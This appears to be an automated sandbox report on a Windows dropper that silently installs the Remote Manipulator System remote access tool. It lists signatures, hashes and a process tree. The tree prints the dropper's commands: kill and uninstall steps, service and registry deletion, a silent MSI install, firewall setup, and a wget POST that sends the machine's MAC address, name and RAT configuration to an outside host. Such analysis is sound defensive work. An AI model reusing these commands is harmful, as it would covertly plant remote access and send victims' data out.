Analysis

  • max time kernel
    146s
  • max time network
    150s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    28-01-2022 15:19

General

  • Target

    550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6.exe

  • Size

    6.8MB

  • MD5

    4795fe6f5ce9557f6cbba6457b7931cc

  • SHA1

    f7abfa5b3dbb90a3804efc1ee82a1e7d951089d8

  • SHA256

    550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6

  • SHA512

    7103d27d71f66434ca24dc4ee64b114bb375440f422c1191ac6eb15eabbc250c8b8d23dcdde523f02d446ef34332deb99256cccaba0ba09f31b4619d0f3e0fa3

Malware Config

Signatures

  • RMS

    Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.

  • Executes dropped EXE 13 IoCs
  • Stops running service(s) 3 TTPs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 23 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 17 IoCs
  • Drops file in Windows directory 19 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies data under HKEY_USERS 20 IoCs
  • Modifies registry class 24 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6.exe
    "C:\Users\Admin\AppData\Local\Temp\550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2564
    • C:\Users\Admin\AppData\Local\Temp\set.exe
      "C:\Users\Admin\AppData\Local\Temp\set.exe" -p1234567890__
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:3824
      • C:\Users\Admin\AppData\Local\Temp\setting.exe
        "C:\Users\Admin\AppData\Local\Temp\setting.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:4084
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\install.cmd" "
          4⤵
          • Drops file in Windows directory
          • Suspicious use of WriteProcessMemory
          PID:3560
          • C:\Windows\SysWOW64\chcp.com
            chcp 1251
            5⤵
              PID:1036
            • C:\Windows\SysWOW64\attrib.exe
              attrib -S -H -r "C:\Windows\system32\sysfiles"
              5⤵
              • Views/modifies file attributes
              PID:1428
            • C:\Windows\SysWOW64\attrib.exe
              attrib -S -H -r "C:\Windows\syswow64\sysfiles"
              5⤵
              • Views/modifies file attributes
              PID:2292
            • C:\Windows\SysWOW64\attrib.exe
              attrib -S -H -r "C:\Program Files (x86)\Remote Manipulator System - Server"
              5⤵
              • Views/modifies file attributes
              PID:1068
            • C:\Windows\SysWOW64\attrib.exe
              attrib -S -H -r "C:\Program Files (x86)\Remote Manipulator System - Server"
              5⤵
              • Views/modifies file attributes
              PID:1736
            • C:\Windows\SysWOW64\net.exe
              net stop rmanservice
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3260
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 stop rmanservice
                6⤵
                  PID:3984
              • C:\Windows\SysWOW64\sc.exe
                sc delete "rmanservice"
                5⤵
                  PID:3792
                • C:\Windows\SysWOW64\tasklist.exe
                  tasklist
                  5⤵
                  • Enumerates processes with tasklist
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3064
                • C:\Windows\SysWOW64\find.exe
                  find "rfusclient.exe"
                  5⤵
                    PID:3244
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /f /im rfusclient.exe
                    5⤵
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2772
                  • C:\Windows\SysWOW64\tasklist.exe
                    tasklist
                    5⤵
                    • Enumerates processes with tasklist
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3544
                  • C:\Windows\SysWOW64\find.exe
                    find "rfusclient.exe *32"
                    5⤵
                      PID:3868
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /f /im rfusclient.exe *32
                      5⤵
                      • Kills process with taskkill
                      PID:2648
                    • C:\Windows\SysWOW64\tasklist.exe
                      tasklist
                      5⤵
                      • Enumerates processes with tasklist
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3136
                    • C:\Windows\SysWOW64\find.exe
                      find "rutserv.exe"
                      5⤵
                        PID:1352
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /f /im rutserv.exe
                        5⤵
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:916
                      • C:\Windows\SysWOW64\tasklist.exe
                        tasklist
                        5⤵
                        • Enumerates processes with tasklist
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1476
                      • C:\Windows\SysWOW64\find.exe
                        find "rutserv.exe *32"
                        5⤵
                          PID:1524
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /f /im rutserv.exe *32
                          5⤵
                          • Kills process with taskkill
                          PID:584
                        • C:\Windows\SysWOW64\msiexec.exe
                          MsiExec /x {61FFA475-24D5-44FB-A51F-39B699E3D82C} /qn REBOOT=ReallySuppress
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:652
                        • C:\Windows\SysWOW64\msiexec.exe
                          MsiExec /x {A5DB67DC-DB0E-4491-B9F7-F258A02EE03C} /qn REBOOT=ReallySuppress
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3636
                        • C:\Windows\SysWOW64\msiexec.exe
                          MsiExec /x {5B1EC627-A9CA-4BE8-966E-5FCB90ECD770} /qn REBOOT=ReallySuppress
                          5⤵
                            PID:1420
                          • C:\Windows\SysWOW64\msiexec.exe
                            MsiExec /x {54D1AB84-6B0B-445D-B7AB-E2B2FEEC3A4F} /qn REBOOT=ReallySuppress
                            5⤵
                              PID:1404
                            • C:\Windows\SysWOW64\msiexec.exe
                              MsiExec /x {FE83B905-4554-4DFF-97F4-9292178CB171} /qn REBOOT=ReallySuppress
                              5⤵
                                PID:1268
                              • C:\Windows\SysWOW64\msiexec.exe
                                MsiExec /x {AB7AA605-500F-4153-8207-FB5563419112} /qn REBOOT=ReallySuppress
                                5⤵
                                  PID:1028
                                • C:\Windows\SysWOW64\reg.exe
                                  reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{11A90858-40BB-4858-A2DA-CA6495B5E907}" /f
                                  5⤵
                                    PID:3100
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\85809A11BB0485842AADAC46595B9E70\InstallProperties" /f
                                    5⤵
                                      PID:1240
                                    • C:\Windows\SysWOW64\reg.exe
                                      reg delete "HKCR\Installer\Products\85809A11BB0485842AADAC465 95B9E70" /f
                                      5⤵
                                        PID:3588
                                      • C:\Windows\SysWOW64\reg.exe
                                        reg delete "HKLM\SYSTEM\Remote Manipulator System" /f
                                        5⤵
                                          PID:816
                                        • C:\Windows\SysWOW64\reg.exe
                                          reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AB7AA605-500F-4153-8207-FB5563419112}" /f
                                          5⤵
                                            PID:4072
                                          • C:\Windows\SysWOW64\reg.exe
                                            reg delete "HKCR\Installer\Products\506AA7BAF00535142870BF5536141921" /f
                                            5⤵
                                              PID:700
                                            • C:\Windows\SysWOW64\reg.exe
                                              reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6EDC4423414699340B5D245426472701" /f
                                              5⤵
                                                PID:2704
                                              • C:\Windows\SysWOW64\reg.exe
                                                reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E45BAE6295648E74689FC47BF4E730EB" /f
                                                5⤵
                                                  PID:3824
                                                • C:\Windows\SysWOW64\reg.exe
                                                  reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E5052F47A02BDEA469F8EAB572D83BA8" /f
                                                  5⤵
                                                    PID:3360
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    reg delete "HKLM\System\CurrentControlSet\Services\RManService" /f
                                                    5⤵
                                                      PID:2296
                                                    • C:\Windows\SysWOW64\PING.EXE
                                                      ping -n 1 -w 500 google.com.ua
                                                      5⤵
                                                      • Runs ping.exe
                                                      PID:1192
                                                    • C:\Windows\SysWOW64\msiexec.exe
                                                      MsiExec /I "rms5.2.1.msi" /qn
                                                      5⤵
                                                        PID:1336
                                                      • C:\Windows\SysWOW64\PING.EXE
                                                        ping -n 10 127.0.0.1
                                                        5⤵
                                                        • Runs ping.exe
                                                        PID:1952
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c Reg Query "HKEY_LOCAL_MACHINE\SYSTEM\Remote Manipulator System\v4\Server\Parameters"|Find /I "Options"
                                                        5⤵
                                                          PID:4092
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            Reg Query "HKEY_LOCAL_MACHINE\SYSTEM\Remote Manipulator System\v4\Server\Parameters"
                                                            6⤵
                                                              PID:1192
                                                            • C:\Windows\SysWOW64\find.exe
                                                              Find /I "Options"
                                                              6⤵
                                                                PID:2348
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c getmac|Find /I "Tcpip"
                                                              5⤵
                                                                PID:2220
                                                                • C:\Windows\SysWOW64\getmac.exe
                                                                  getmac
                                                                  6⤵
                                                                    PID:4000
                                                                  • C:\Windows\SysWOW64\find.exe
                                                                    Find /I "Tcpip"
                                                                    6⤵
                                                                      PID:3428
                                                                  • C:\Users\Admin\AppData\Local\Temp\wget.exe
                                                                    wget --post-data="mac=76-BA-EE-31-78-4E&comp=MHKKHUYI&id=545046301154524F4D5365727665724F7074696F6E7300095573654E5441757468080D53656375726974794C6576656C020304506F727403121614456E61626C654F7665726C617943617074757265080C53686F775472617949636F6E080642696E644950060D416E7920696E746572666163651343616C6C6261636B4175746F436F6E6E656374091743616C6C6261636B436F6E6E656374496E74657276616C023C084869646553746F70090C497046696C7465725479706502021750726F7465637443616C6C6261636B53657474696E6773081550726F74656374496E6574496453657474696E6773080F446F4E6F7443617074757265524450080755736549507636091141736B557365725065726D697373696F6E0816557365725065726D697373696F6E496E74657276616C031027134175746F416C6C6F775065726D697373696F6E08134E656564417574686F72697479536572766572081F41736B5065726D697373696F6E4F6E6C794966557365724C6F676765644F6E080A496E7465726E657449640614532D45464244464346342D464333462D3433413411557365496E6574436F6E6E656374696F6E0913557365437573746F6D496E6574536572766572080A496E65744964506F72740317160D557365496E6574496449507636081444697361626C6552656D6F7465436F6E74726F6C081344697361626C6552656D6F746553637265656E081344697361626C6546696C655472616E73666572080F44697361626C655265646972656374080D44697361626C6554656C6E6574081444697361626C6552656D6F746545786563757465081244697361626C655461736B4D616E61676572080E44697361626C654F7665726C6179080F44697361626C6553687574646F776E081444697361626C6552656D6F746555706772616465081544697361626C655072657669657743617074757265081444697361626C654465766963654D616E61676572080B44697361626C6543686174081344697361626C6553637265656E5265636F7264081044697361626C65415643617074757265081244697361626C6553656E644D657373616765080F44697361626C655265676973747279080D44697361626C65415643686174081544697361626C6552656D6F746553657474696E677308144E6F746966794368616E67655472617949636F6E08104E6F7469667942616C6C6F6E48696E74080F4E6F74696679506C6179536F756E6408064C6F6755736508055369644964061034313735392E36383938343339353833084C6963656E73657306C2524D532D5A2D36414233383733313239626646373830303843323145666633453845434564616269593253326459586C52664477776E4932315756305A65586C39515643467866456457447778655241395749436732625674645555464457464E75596A39474267315A56673445416D5A2B61674145486C6C57446731554A6E4E6942785542424238434151466D456D49424167414243415548444830704A777745556C354744674141626D4977584577504442316256456B4E4A4431555677383D0D50726F787953657474696E67731426010000EFBBBF3C3F786D6C2076657273696F6E3D22312E302220656E636F64696E673D225554462D3136223F3E0D0A3C70726F78795F73657474696E67732076657273696F6E3D223532313030223E3C7573655F70726F78793E66616C73653C2F7573655F70726F78793E3C70726F78795F747970653E303C2F70726F78795F747970653E3C686F73743E3C2F686F73743E3C706F72743E383038303C2F706F72743E3C6E6565645F617574683E66616C73653C2F6E6565645F617574683E3C6E746D6C5F617574683E66616C73653C2F6E746D6C5F617574683E3C757365726E616D653E3C2F757365726E616D653E3C70617373776F72643E3C2F70617373776F72643E3C646F6D61696E3E3C2F646F6D61696E3E3C2F70726F78795F73657474696E67733E0D0A1144697361626C65496E7465726E65744964080000&group=download" "http://rms.admin-ru.ru/updater.php" -q -O -
                                                                    5⤵
                                                                    • Executes dropped EXE
                                                                    PID:3728
                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                    ping -n 3 127.0.0.1
                                                                    5⤵
                                                                    • Runs ping.exe
                                                                    PID:3952
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
                                                                  4⤵
                                                                    PID:648
                                                            • C:\Windows\system32\msiexec.exe
                                                              C:\Windows\system32\msiexec.exe /V
                                                              1⤵
                                                              • Enumerates connected drives
                                                              • Drops file in System32 directory
                                                              • Drops file in Windows directory
                                                              • Modifies data under HKEY_USERS
                                                              • Modifies registry class
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:432
                                                              • C:\Windows\syswow64\MsiExec.exe
                                                                C:\Windows\syswow64\MsiExec.exe -Embedding 14B7B4596FA45B7BCF74D202BD8A2D13
                                                                2⤵
                                                                • Loads dropped DLL
                                                                PID:4060
                                                              • C:\Windows\SysWOW64\sysfiles\rfusclient.exe
                                                                "C:\Windows\SysWOW64\sysfiles\rfusclient.exe" /server /silentinstall
                                                                2⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                • Modifies data under HKEY_USERS
                                                                PID:2848
                                                                • C:\Windows\SysWOW64\sysfiles\rutserv.exe
                                                                  "C:\Windows\SysWOW64\sysfiles\rutserv.exe" /silentinstall
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  • Drops file in System32 directory
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:3968
                                                              • C:\Windows\SysWOW64\sysfiles\rfusclient.exe
                                                                "C:\Windows\SysWOW64\sysfiles\rfusclient.exe" /server /firewall
                                                                2⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                • Modifies data under HKEY_USERS
                                                                PID:64
                                                                • C:\Windows\SysWOW64\sysfiles\rutserv.exe
                                                                  "C:\Windows\SysWOW64\sysfiles\rutserv.exe" /firewall
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  • Modifies data under HKEY_USERS
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:684
                                                              • C:\Windows\SysWOW64\sysfiles\rfusclient.exe
                                                                "C:\Windows\SysWOW64\sysfiles\rfusclient.exe" /server /start
                                                                2⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                • Modifies data under HKEY_USERS
                                                                PID:3900
                                                                • C:\Windows\SysWOW64\sysfiles\rutserv.exe
                                                                  "C:\Windows\SysWOW64\sysfiles\rutserv.exe" /start
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:744
                                                            • C:\Windows\SysWOW64\sysfiles\rutserv.exe
                                                              C:\Windows\SysWOW64\sysfiles\rutserv.exe
                                                              1⤵
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:1380
                                                              • C:\Windows\SysWOW64\sysfiles\rfusclient.exe
                                                                C:\Windows\SysWOW64\sysfiles\rfusclient.exe
                                                                2⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:688
                                                                • C:\Windows\SysWOW64\sysfiles\rfusclient.exe
                                                                  C:\Windows\SysWOW64\sysfiles\rfusclient.exe /tray
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  • Suspicious behavior: SetClipboardViewer
                                                                  PID:3360
                                                              • C:\Windows\SysWOW64\sysfiles\rfusclient.exe
                                                                C:\Windows\SysWOW64\sysfiles\rfusclient.exe /tray
                                                                2⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                PID:408

                                                            Network

                                                            MITRE ATT&CK Enterprise v6

                                                            Replay Monitor

                                                            Loading Replay Monitor...

                                                            Downloads

                                                            • memory/64-402-0x0000000002390000-0x0000000002391000-memory.dmp

                                                              Filesize

                                                              4KB

                                                            • memory/408-432-0x0000000000920000-0x0000000000A6A000-memory.dmp

                                                              Filesize

                                                              1.3MB

                                                            • memory/684-403-0x0000000000A70000-0x0000000000BBA000-memory.dmp

                                                              Filesize

                                                              1.3MB

                                                            • memory/688-433-0x00000000009B0000-0x0000000000AFA000-memory.dmp

                                                              Filesize

                                                              1.3MB

                                                            • memory/744-430-0x0000000000A30000-0x0000000000B7A000-memory.dmp

                                                              Filesize

                                                              1.3MB

                                                            • memory/1380-431-0x00000000001E0000-0x00000000001E1000-memory.dmp

                                                              Filesize

                                                              4KB

                                                            • memory/2848-391-0x0000000000870000-0x000000000091E000-memory.dmp

                                                              Filesize

                                                              696KB

                                                            • memory/3900-429-0x00000000009E0000-0x00000000009E1000-memory.dmp

                                                              Filesize

                                                              4KB

                                                            • memory/3968-394-0x0000000000AF0000-0x0000000000AF1000-memory.dmp

                                                              Filesize

                                                              4KB